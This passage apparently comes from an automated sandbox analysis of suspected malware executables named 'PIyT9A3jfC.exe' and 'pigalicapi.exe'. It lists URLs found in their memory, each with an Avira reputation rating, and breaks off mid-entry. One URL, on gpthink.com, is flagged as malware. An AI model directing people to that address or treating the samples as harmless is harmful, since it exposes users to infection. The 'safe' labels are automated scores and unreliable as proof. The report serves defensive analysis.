                                                                                                                                                                                                                              https://oss.maxcdn.com/respond/1.4.2/respond.min.jsPIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                https://www.elpro.si/wp-content/uploads/2023/07/PRENOSNA_2220-9670-asfalt_asvalt_moder-150x150.jpgpigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                http://www.naoi-a.commPIyT9A3jfC.exe, 00000001.00000002.891190103.000000000449D000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                http://pohlfood.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wcPIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                https://pohlfood.com/#websitePIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                https://www.pcgrate.com/#webpagepigalicapi.exe, 00000003.00000003.669232158.0000000004E30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                https://inhouse.pohlfood.com/PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                https://www.elpro.si/wp-content/uploads/2020/03/ICO-75-Prenosne-naprave.svgpigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                https://www.elpro.si/kategorija-izdelka/rotronic/temperatura-rotronic-merilniki-temperature/PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/manometri-z-izhodnim-signalom/PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                http://pohlfood.com/wp-content/plugins/ooohboi-steroids-for-elementor/assets/css/main.css?ver=2.1.50PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/prikazovalnik-toka-jola/PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/regulacija-nivoja/meritevPIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                https://www.elpro.si/wp-content/uploads/2023/06/Untitled-design-64x36.jpgpigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                http://www.myropcb.com/wp-content/themes/thematic/library/scripts/supersubs.jsPIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                http://gpthink.com/product/204.htmlPIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                http://pohlfood.com/wp-content/plugins/elementor/assets/js/preloaded-modules.min.js?ver=3.14.1PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                https://www.elpro.si/wp-content/uploads/2022/10/akcija-5-of-25-Copy-600x599.jpgpigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                https://www.elpro.si/kategorija-izdelka/wika-partner/tlak/pretvorniki-tlaka-wika/PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                http://www.com-sit.com/wp-content/uploads/premium-addons-elementor/pa-frontend-2947ecb72.min.css?verPIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                  http://www.pb-games.co/PIyT9A3jfC.exe, 00000001.00000003.796045606.00000000076C3000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.777742716.00000000076C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                  https://www.elpro.si/kategorija-izdelka/wika-partner/temperatura/prikazovalniki-temperature/PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                  http://www.elpro.si/wp-content/plugins/magic-tooltips-for-contact-form-7/assets/css/jquery.qtip.min.PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, 